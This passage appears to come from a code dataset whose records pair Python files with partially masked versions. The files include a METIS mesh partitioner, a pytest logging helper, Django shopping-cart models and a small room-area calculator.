SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. import metis import subprocess METIS_MESH = 'metis.mesh' METIS_GRAPH = 'metis.graph' class Partitioner: """Converts a mesh into graph and partitions it using metis""" def __init__(self, mesh, partitions, tmpdir): metisMesh = tmpdir.path(METIS_MESH) # Write metis mesh metis.MeshWriter(metisMesh, mesh.elements()) # Convert to graph metisGraph = tmpdir.path(METIS_GRAPH) p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh, metisGraph], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, errmsg = p.communicate() if p.returncode: raise Exception(errmsg.strip()) # Run metis p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(partitions)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, errmsg = p.communicate() if p.returncode: raise Exception(errmsg.strip()) # Read partitions self.__partition = metis.PartitionReader(metisGraph+'.part.'+str(partitions), partitions, len(mesh.elements())) if self.__partition.size() != len(mesh.elements()): raise Exception('Mesh size and partition size do not match: mesh size = ' +str(len(mesh.elements()))+' != partition size = '+str(self.__partition.size())) def partition(self): return self.__partition
normal
{ "blob_id": "91e1ac12ba99a8efd8f7f26310244d83bdd4aa52", "index": 2510, "step-1": "<mask token>\n\n\nclass Partitioner:\n <mask token>\n\n def __init__(self, mesh, partitions, tmpdir):\n metisMesh = tmpdir.path(METIS_MESH)\n metis.MeshWriter(metisMesh, mesh.elements())\n metisGraph = tmpdir.path(METIS_GRAPH)\n p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh,\n metisGraph], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(\n partitions)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n self.__partition = metis.PartitionReader(metisGraph + '.part.' +\n str(partitions), partitions, len(mesh.elements()))\n if self.__partition.size() != len(mesh.elements()):\n raise Exception(\n 'Mesh size and partition size do not match: mesh size = ' +\n str(len(mesh.elements())) + ' != partition size = ' + str(\n self.__partition.size()))\n\n def partition(self):\n return self.__partition\n", "step-2": "<mask token>\n\n\nclass Partitioner:\n \"\"\"Converts a mesh into graph and partitions it using metis\"\"\"\n\n def __init__(self, mesh, partitions, tmpdir):\n metisMesh = tmpdir.path(METIS_MESH)\n metis.MeshWriter(metisMesh, mesh.elements())\n metisGraph = tmpdir.path(METIS_GRAPH)\n p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh,\n metisGraph], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(\n partitions)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n self.__partition = metis.PartitionReader(metisGraph + '.part.' +\n str(partitions), partitions, len(mesh.elements()))\n if self.__partition.size() != len(mesh.elements()):\n raise Exception(\n 'Mesh size and partition size do not match: mesh size = ' +\n str(len(mesh.elements())) + ' != partition size = ' + str(\n self.__partition.size()))\n\n def partition(self):\n return self.__partition\n", "step-3": "<mask token>\nMETIS_MESH = 'metis.mesh'\nMETIS_GRAPH = 'metis.graph'\n\n\nclass Partitioner:\n \"\"\"Converts a mesh into graph and partitions it using metis\"\"\"\n\n def __init__(self, mesh, partitions, tmpdir):\n metisMesh = tmpdir.path(METIS_MESH)\n metis.MeshWriter(metisMesh, mesh.elements())\n metisGraph = tmpdir.path(METIS_GRAPH)\n p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh,\n metisGraph], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(\n partitions)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n self.__partition = metis.PartitionReader(metisGraph + '.part.' +\n str(partitions), partitions, len(mesh.elements()))\n if self.__partition.size() != len(mesh.elements()):\n raise Exception(\n 'Mesh size and partition size do not match: mesh size = ' +\n str(len(mesh.elements())) + ' != partition size = ' + str(\n self.__partition.size()))\n\n def partition(self):\n return self.__partition\n", "step-4": "import metis\nimport subprocess\nMETIS_MESH = 'metis.mesh'\nMETIS_GRAPH = 'metis.graph'\n\n\nclass Partitioner:\n \"\"\"Converts a mesh into graph and partitions it using metis\"\"\"\n\n def __init__(self, mesh, partitions, tmpdir):\n metisMesh = tmpdir.path(METIS_MESH)\n metis.MeshWriter(metisMesh, mesh.elements())\n metisGraph = tmpdir.path(METIS_GRAPH)\n p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh,\n metisGraph], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(\n partitions)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n self.__partition = metis.PartitionReader(metisGraph + '.part.' +\n str(partitions), partitions, len(mesh.elements()))\n if self.__partition.size() != len(mesh.elements()):\n raise Exception(\n 'Mesh size and partition size do not match: mesh size = ' +\n str(len(mesh.elements())) + ' != partition size = ' + str(\n self.__partition.size()))\n\n def partition(self):\n return self.__partition\n", "step-5": "#!/usr/bin/python\n##\n# @file\n# This file is part of SeisSol.\n#\n# @author Sebastian Rettenberger (rettenbs AT in.tum.de, http://www5.in.tum.de/wiki/index.php/Sebastian_Rettenberger,_M.Sc.)\n#\n# @section LICENSE\n# Copyright (c) 2013, SeisSol Group\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# \n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# \n# 3. Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from this\n# software without specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nimport metis\n\nimport subprocess\n\nMETIS_MESH = 'metis.mesh'\nMETIS_GRAPH = 'metis.graph'\n\nclass Partitioner:\n \"\"\"Converts a mesh into graph and partitions it using metis\"\"\"\n \n def __init__(self, mesh, partitions, tmpdir):\n metisMesh = tmpdir.path(METIS_MESH)\n \n # Write metis mesh\n metis.MeshWriter(metisMesh, mesh.elements())\n \n # Convert to graph\n metisGraph = tmpdir.path(METIS_GRAPH)\n p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh, metisGraph],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n \n # Run metis\n p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(partitions)],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n \n # Read partitions\n self.__partition = metis.PartitionReader(metisGraph+'.part.'+str(partitions),\n partitions, len(mesh.elements()))\n \n if self.__partition.size() != len(mesh.elements()):\n raise Exception('Mesh size and partition size do not match: mesh size = '\n +str(len(mesh.elements()))+' != partition size = '+str(self.__partition.size()))\n \n def partition(self):\n return self.__partition\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
# vim:fileencoding=utf-8:noet from __future__ import absolute_import, unicode_literals, print_function import os BINDINGS_DIRECTORY = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'bindings') TMUX_CONFIG_DIRECTORY = os.path.join(BINDINGS_DIRECTORY, 'tmux') DEFAULT_SYSTEM_CONFIG_DIR = None
normal
{ "blob_id": "c435b0f162512bb2bc0c35e1817f64c5ef9ff7bc", "index": 1871, "step-1": "<mask token>\n", "step-2": "<mask token>\nBINDINGS_DIRECTORY = os.path.join(os.path.dirname(os.path.abspath(__file__)\n ), 'bindings')\nTMUX_CONFIG_DIRECTORY = os.path.join(BINDINGS_DIRECTORY, 'tmux')\nDEFAULT_SYSTEM_CONFIG_DIR = None\n", "step-3": "from __future__ import absolute_import, unicode_literals, print_function\nimport os\nBINDINGS_DIRECTORY = os.path.join(os.path.dirname(os.path.abspath(__file__)\n ), 'bindings')\nTMUX_CONFIG_DIRECTORY = os.path.join(BINDINGS_DIRECTORY, 'tmux')\nDEFAULT_SYSTEM_CONFIG_DIR = None\n", "step-4": "# vim:fileencoding=utf-8:noet\n\nfrom __future__ import absolute_import, unicode_literals, print_function\nimport os\n\nBINDINGS_DIRECTORY = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'bindings')\nTMUX_CONFIG_DIRECTORY = os.path.join(BINDINGS_DIRECTORY, 'tmux')\nDEFAULT_SYSTEM_CONFIG_DIR = None\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import json import logging import os import sys from io import StringIO import pytest from allure.constants import AttachmentType from utils.tools import close_popups _beautiful_json = dict(indent=2, ensure_ascii=False, sort_keys=True) # LOGGING console #################################################################################################### # Reserved name for custom logging logging.addLevelName(15, "SUBDEBUG") logging.addLevelName(5, "TEST") # Logger formating log_formatter = logging.Formatter("%(asctime)s [%(threadName)s] [%(levelname)s] - %(message)s", datefmt='%Y-%m-%d %H:%M:%S') class CustomLogger(logging.Logger): test_log = StringIO() # Metod formating message @staticmethod def format_message(message): return json.dumps(message, **_beautiful_json) if isinstance(message, (dict, list, tuple)) else str(message) # Custom level of logging def subdebug(self, message, *args, **kwargs): if self.isEnabledFor(15): self._log(15, message, args, **kwargs) # Method to attached data to report (one class dependency) def attach_debug(self, name, message): if self.isEnabledFor(10): pytest.allure.attach(name, self.format_message(message)) def attach_subdebug(self, name, message): if self.isEnabledFor(15): pytest.allure.attach(name, self.format_message(message)) def attach_info(self, name, message): if self.isEnabledFor(20): pytest.allure.attach(name, self.format_message(message)) def attach_error(self, name, message): pytest.allure.attach(name, self.format_message(message)) @staticmethod def attach_png(name, message): pytest.allure.attach(name, message, type=AttachmentType.PNG) def attach_selenium_screenshot(self, attach_name, selenium_driver): if selenium_driver: try: close_popups(selenium_driver) self.debug('Attach screenshot') self.attach_png(attach_name, selenium_driver.get_screenshot_as_png()) self.debug('...Done') except Exception as e: self.error('Cannot get screenshot from SeleniumWebDriver') pytest.allure.attach(attach_name, str(e)) else: self.error('No browser is define') def add_handler(self, file_name, mode='a'): file_handler = logging.FileHandler(filename=file_name, mode=mode) file_handler.setFormatter(log_formatter) file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN')) self.addHandler(file_handler) def setup_logging(): # Logging setup logger = CustomLogger('root') # Level of handler console_handler = logging.StreamHandler(sys.stdout) console_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN')) # Create a method of message console_handler.setFormatter(log_formatter) logger.addHandler(console_handler) # Level of handler string_io = logging.StreamHandler(logger.test_log) string_io.setLevel(os.getenv('LOGGING_LEVEL', 'INFO')) # Create a method of message string_io.setFormatter(log_formatter) logger.addHandler(string_io) return logger logger = setup_logging()
normal
{ "blob_id": "37fdfddb471e2eec9e5867d685c7c56fc38c5ae7", "index": 8363, "step-1": "<mask token>\n\n\nclass CustomLogger(logging.Logger):\n <mask token>\n\n @staticmethod\n def format_message(message):\n return json.dumps(message, **_beautiful_json) if isinstance(message,\n (dict, list, tuple)) else str(message)\n\n def subdebug(self, message, *args, **kwargs):\n if self.isEnabledFor(15):\n self._log(15, message, args, **kwargs)\n\n def attach_debug(self, name, message):\n if self.isEnabledFor(10):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_subdebug(self, name, message):\n if self.isEnabledFor(15):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_info(self, name, message):\n if self.isEnabledFor(20):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_error(self, name, message):\n pytest.allure.attach(name, self.format_message(message))\n\n @staticmethod\n def attach_png(name, message):\n pytest.allure.attach(name, message, type=AttachmentType.PNG)\n\n def attach_selenium_screenshot(self, attach_name, selenium_driver):\n if selenium_driver:\n try:\n close_popups(selenium_driver)\n self.debug('Attach screenshot')\n self.attach_png(attach_name, selenium_driver.\n get_screenshot_as_png())\n self.debug('...Done')\n except Exception as e:\n self.error('Cannot get screenshot from SeleniumWebDriver')\n pytest.allure.attach(attach_name, str(e))\n else:\n self.error('No browser is define')\n\n def add_handler(self, file_name, mode='a'):\n file_handler = logging.FileHandler(filename=file_name, mode=mode)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n self.addHandler(file_handler)\n\n\n<mask token>\n", "step-2": "<mask token>\nlogging.addLevelName(15, 'SUBDEBUG')\nlogging.addLevelName(5, 'TEST')\n<mask token>\n\n\nclass CustomLogger(logging.Logger):\n test_log = StringIO()\n\n @staticmethod\n def format_message(message):\n return json.dumps(message, **_beautiful_json) if isinstance(message,\n (dict, list, tuple)) else str(message)\n\n def subdebug(self, message, *args, **kwargs):\n if self.isEnabledFor(15):\n self._log(15, message, args, **kwargs)\n\n def attach_debug(self, name, message):\n if self.isEnabledFor(10):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_subdebug(self, name, message):\n if self.isEnabledFor(15):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_info(self, name, message):\n if self.isEnabledFor(20):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_error(self, name, message):\n pytest.allure.attach(name, self.format_message(message))\n\n @staticmethod\n def attach_png(name, message):\n pytest.allure.attach(name, message, type=AttachmentType.PNG)\n\n def attach_selenium_screenshot(self, attach_name, selenium_driver):\n if selenium_driver:\n try:\n close_popups(selenium_driver)\n self.debug('Attach screenshot')\n self.attach_png(attach_name, selenium_driver.\n get_screenshot_as_png())\n self.debug('...Done')\n except Exception as e:\n self.error('Cannot get screenshot from SeleniumWebDriver')\n pytest.allure.attach(attach_name, str(e))\n else:\n self.error('No browser is define')\n\n def add_handler(self, file_name, mode='a'):\n file_handler = logging.FileHandler(filename=file_name, mode=mode)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n self.addHandler(file_handler)\n\n\ndef setup_logging():\n logger = CustomLogger('root')\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n console_handler.setFormatter(log_formatter)\n logger.addHandler(console_handler)\n string_io = logging.StreamHandler(logger.test_log)\n string_io.setLevel(os.getenv('LOGGING_LEVEL', 'INFO'))\n string_io.setFormatter(log_formatter)\n logger.addHandler(string_io)\n return logger\n\n\n<mask token>\n", "step-3": "<mask token>\n_beautiful_json = dict(indent=2, ensure_ascii=False, sort_keys=True)\nlogging.addLevelName(15, 'SUBDEBUG')\nlogging.addLevelName(5, 'TEST')\nlog_formatter = logging.Formatter(\n '%(asctime)s [%(threadName)s] [%(levelname)s] - %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n\n\nclass CustomLogger(logging.Logger):\n test_log = StringIO()\n\n @staticmethod\n def format_message(message):\n return json.dumps(message, **_beautiful_json) if isinstance(message,\n (dict, list, tuple)) else str(message)\n\n def subdebug(self, message, *args, **kwargs):\n if self.isEnabledFor(15):\n self._log(15, message, args, **kwargs)\n\n def attach_debug(self, name, message):\n if self.isEnabledFor(10):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_subdebug(self, name, message):\n if self.isEnabledFor(15):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_info(self, name, message):\n if self.isEnabledFor(20):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_error(self, name, message):\n pytest.allure.attach(name, self.format_message(message))\n\n @staticmethod\n def attach_png(name, message):\n pytest.allure.attach(name, message, type=AttachmentType.PNG)\n\n def attach_selenium_screenshot(self, attach_name, selenium_driver):\n if selenium_driver:\n try:\n close_popups(selenium_driver)\n self.debug('Attach screenshot')\n self.attach_png(attach_name, selenium_driver.\n get_screenshot_as_png())\n self.debug('...Done')\n except Exception as e:\n self.error('Cannot get screenshot from SeleniumWebDriver')\n pytest.allure.attach(attach_name, str(e))\n else:\n self.error('No browser is define')\n\n def add_handler(self, file_name, mode='a'):\n file_handler = logging.FileHandler(filename=file_name, mode=mode)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n self.addHandler(file_handler)\n\n\ndef setup_logging():\n logger = CustomLogger('root')\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n console_handler.setFormatter(log_formatter)\n logger.addHandler(console_handler)\n string_io = logging.StreamHandler(logger.test_log)\n string_io.setLevel(os.getenv('LOGGING_LEVEL', 'INFO'))\n string_io.setFormatter(log_formatter)\n logger.addHandler(string_io)\n return logger\n\n\nlogger = setup_logging()\n", "step-4": "import json\nimport logging\nimport os\nimport sys\nfrom io import StringIO\nimport pytest\nfrom allure.constants import AttachmentType\nfrom utils.tools import close_popups\n_beautiful_json = dict(indent=2, ensure_ascii=False, sort_keys=True)\nlogging.addLevelName(15, 'SUBDEBUG')\nlogging.addLevelName(5, 'TEST')\nlog_formatter = logging.Formatter(\n '%(asctime)s [%(threadName)s] [%(levelname)s] - %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n\n\nclass CustomLogger(logging.Logger):\n test_log = StringIO()\n\n @staticmethod\n def format_message(message):\n return json.dumps(message, **_beautiful_json) if isinstance(message,\n (dict, list, tuple)) else str(message)\n\n def subdebug(self, message, *args, **kwargs):\n if self.isEnabledFor(15):\n self._log(15, message, args, **kwargs)\n\n def attach_debug(self, name, message):\n if self.isEnabledFor(10):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_subdebug(self, name, message):\n if self.isEnabledFor(15):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_info(self, name, message):\n if self.isEnabledFor(20):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_error(self, name, message):\n pytest.allure.attach(name, self.format_message(message))\n\n @staticmethod\n def attach_png(name, message):\n pytest.allure.attach(name, message, type=AttachmentType.PNG)\n\n def attach_selenium_screenshot(self, attach_name, selenium_driver):\n if selenium_driver:\n try:\n close_popups(selenium_driver)\n self.debug('Attach screenshot')\n self.attach_png(attach_name, selenium_driver.\n get_screenshot_as_png())\n self.debug('...Done')\n except Exception as e:\n self.error('Cannot get screenshot from SeleniumWebDriver')\n pytest.allure.attach(attach_name, str(e))\n else:\n self.error('No browser is define')\n\n def add_handler(self, file_name, mode='a'):\n file_handler = logging.FileHandler(filename=file_name, mode=mode)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n self.addHandler(file_handler)\n\n\ndef setup_logging():\n logger = CustomLogger('root')\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n console_handler.setFormatter(log_formatter)\n logger.addHandler(console_handler)\n string_io = logging.StreamHandler(logger.test_log)\n string_io.setLevel(os.getenv('LOGGING_LEVEL', 'INFO'))\n string_io.setFormatter(log_formatter)\n logger.addHandler(string_io)\n return logger\n\n\nlogger = setup_logging()\n", "step-5": "import json\nimport logging\nimport os\nimport sys\nfrom io import StringIO\n\nimport pytest\nfrom allure.constants import AttachmentType\n\nfrom utils.tools import close_popups\n\n_beautiful_json = dict(indent=2, ensure_ascii=False, sort_keys=True)\n\n# LOGGING console ####################################################################################################\n# Reserved name for custom logging\nlogging.addLevelName(15, \"SUBDEBUG\")\nlogging.addLevelName(5, \"TEST\")\n\n# Logger formating\nlog_formatter = logging.Formatter(\"%(asctime)s [%(threadName)s] [%(levelname)s] - %(message)s\",\n datefmt='%Y-%m-%d %H:%M:%S')\n\n\nclass CustomLogger(logging.Logger):\n test_log = StringIO()\n\n # Metod formating message\n @staticmethod\n def format_message(message):\n return json.dumps(message, **_beautiful_json) if isinstance(message, (dict, list, tuple)) else str(message)\n\n # Custom level of logging\n def subdebug(self, message, *args, **kwargs):\n if self.isEnabledFor(15):\n self._log(15, message, args, **kwargs)\n\n # Method to attached data to report (one class dependency)\n def attach_debug(self, name, message):\n if self.isEnabledFor(10):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_subdebug(self, name, message):\n if self.isEnabledFor(15):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_info(self, name, message):\n if self.isEnabledFor(20):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_error(self, name, message):\n pytest.allure.attach(name, self.format_message(message))\n\n @staticmethod\n def attach_png(name, message):\n pytest.allure.attach(name, message, type=AttachmentType.PNG)\n\n def attach_selenium_screenshot(self, attach_name, selenium_driver):\n if selenium_driver:\n try:\n close_popups(selenium_driver)\n self.debug('Attach screenshot')\n self.attach_png(attach_name, selenium_driver.get_screenshot_as_png())\n self.debug('...Done')\n except Exception as e:\n self.error('Cannot get screenshot from SeleniumWebDriver')\n pytest.allure.attach(attach_name, str(e))\n\n else:\n self.error('No browser is define')\n\n def add_handler(self, file_name, mode='a'):\n file_handler = logging.FileHandler(filename=file_name, mode=mode)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n self.addHandler(file_handler)\n\n\ndef setup_logging():\n # Logging setup\n logger = CustomLogger('root')\n\n # Level of handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n # Create a method of message\n console_handler.setFormatter(log_formatter)\n logger.addHandler(console_handler)\n\n # Level of handler\n string_io = logging.StreamHandler(logger.test_log)\n string_io.setLevel(os.getenv('LOGGING_LEVEL', 'INFO'))\n # Create a method of message\n string_io.setFormatter(log_formatter)\n logger.addHandler(string_io)\n return logger\n\n\nlogger = setup_logging()\n", "step-ids": [ 10, 13, 14, 15, 16 ] }
[ 10, 13, 14, 15, 16 ]
from django.db import models from home.models import MainUser from product.models import Product # Create your models here. class Cart(models.Model): user = models.ForeignKey(MainUser,on_delete=models.CASCADE) item = models.ForeignKey(Product, on_delete=models.CASCADE) quantity = models.PositiveIntegerField(default=1) parchased=models.BooleanField(default=False) created = models.DateTimeField(auto_now_add=True) updated = models.DateTimeField(auto_now=True) def __str__(self): return f'{self.item}x{self.quantity}' def get_total(self): total=self.item.price *self.quantity f_total=format(total,'0.2f') return f_total class Order(models.Model): orderitems = models.ManyToManyField(Cart) user=models.ForeignKey(MainUser,on_delete=models.CASCADE) ordered=models.BooleanField(default=False) created = models.DateTimeField(auto_now_add=True) payment_id=models.CharField(max_length=300,blank=True,null=True) orderid=models.CharField(max_length=300,blank=True,null=True)
normal
{ "blob_id": "454d210c1b1a41e4a645ef7ccb24f80ee20a451c", "index": 2224, "step-1": "<mask token>\n\n\nclass Cart(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_total(self):\n total = self.item.price * self.quantity\n f_total = format(total, '0.2f')\n return f_total\n\n\nclass Order(models.Model):\n orderitems = models.ManyToManyField(Cart)\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n ordered = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n payment_id = models.CharField(max_length=300, blank=True, null=True)\n orderid = models.CharField(max_length=300, blank=True, null=True)\n", "step-2": "<mask token>\n\n\nclass Cart(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return f'{self.item}x{self.quantity}'\n\n def get_total(self):\n total = self.item.price * self.quantity\n f_total = format(total, '0.2f')\n return f_total\n\n\nclass Order(models.Model):\n orderitems = models.ManyToManyField(Cart)\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n ordered = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n payment_id = models.CharField(max_length=300, blank=True, null=True)\n orderid = models.CharField(max_length=300, blank=True, null=True)\n", "step-3": "<mask token>\n\n\nclass Cart(models.Model):\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n item = models.ForeignKey(Product, on_delete=models.CASCADE)\n quantity = models.PositiveIntegerField(default=1)\n parchased = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return f'{self.item}x{self.quantity}'\n\n def get_total(self):\n total = self.item.price * self.quantity\n f_total = format(total, '0.2f')\n return f_total\n\n\nclass Order(models.Model):\n orderitems = models.ManyToManyField(Cart)\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n ordered = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n payment_id = models.CharField(max_length=300, blank=True, null=True)\n orderid = models.CharField(max_length=300, blank=True, null=True)\n", "step-4": "from django.db import models\nfrom home.models import MainUser\nfrom product.models import Product\n\n\nclass Cart(models.Model):\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n item = models.ForeignKey(Product, on_delete=models.CASCADE)\n quantity = models.PositiveIntegerField(default=1)\n parchased = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return f'{self.item}x{self.quantity}'\n\n def get_total(self):\n total = self.item.price * self.quantity\n f_total = format(total, '0.2f')\n return f_total\n\n\nclass Order(models.Model):\n orderitems = models.ManyToManyField(Cart)\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n ordered = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n payment_id = models.CharField(max_length=300, blank=True, null=True)\n orderid = models.CharField(max_length=300, blank=True, null=True)\n", "step-5": "from django.db import models\nfrom home.models import MainUser\nfrom product.models import Product\n# Create your models here.\nclass Cart(models.Model):\n user = models.ForeignKey(MainUser,on_delete=models.CASCADE)\n item = models.ForeignKey(Product, on_delete=models.CASCADE)\n\n quantity = models.PositiveIntegerField(default=1)\n parchased=models.BooleanField(default=False)\n\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n \n\n def __str__(self):\n return f'{self.item}x{self.quantity}'\n\n\n def get_total(self):\n total=self.item.price *self.quantity \n f_total=format(total,'0.2f')\n return f_total\n \nclass Order(models.Model):\n orderitems = models.ManyToManyField(Cart)\n user=models.ForeignKey(MainUser,on_delete=models.CASCADE)\n ordered=models.BooleanField(default=False)\n\n created = models.DateTimeField(auto_now_add=True)\n payment_id=models.CharField(max_length=300,blank=True,null=True)\n orderid=models.CharField(max_length=300,blank=True,null=True)\n\n \n\n ", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
def main(): piso = largura * comprimento volume_sala = largura * comprimento * altura area = 2 * altura * largura + 2 * altura * comprimento print(piso) print(volume_sala) print(area) altura = float(input("")) largura = float(input("")) comprimento = float(input("")) if __name__ == '__main__': main()
normal
{ "blob_id": "d78fd8ebf9ef55700a25a9ce96d9094f1bfa564e", "index": 6455, "step-1": "<mask token>\n", "step-2": "def main():\n piso = largura * comprimento\n volume_sala = largura * comprimento * altura\n area = 2 * altura * largura + 2 * altura * comprimento\n print(piso)\n print(volume_sala)\n print(area)\n\n\n<mask token>\n", "step-3": "def main():\n piso = largura * comprimento\n volume_sala = largura * comprimento * altura\n area = 2 * altura * largura + 2 * altura * comprimento\n print(piso)\n print(volume_sala)\n print(area)\n\n\n<mask token>\nif __name__ == '__main__':\n main()\n", "step-4": "def main():\n piso = largura * comprimento\n volume_sala = largura * comprimento * altura\n area = 2 * altura * largura + 2 * altura * comprimento\n print(piso)\n print(volume_sala)\n print(area)\n\n\naltura = float(input(''))\nlargura = float(input(''))\ncomprimento = float(input(''))\nif __name__ == '__main__':\n main()\n", "step-5": "def main():\n piso = largura * comprimento\n volume_sala = largura * comprimento * altura\n area = 2 * altura * largura + 2 * altura * comprimento\n print(piso)\n print(volume_sala)\n print(area)\n\naltura = 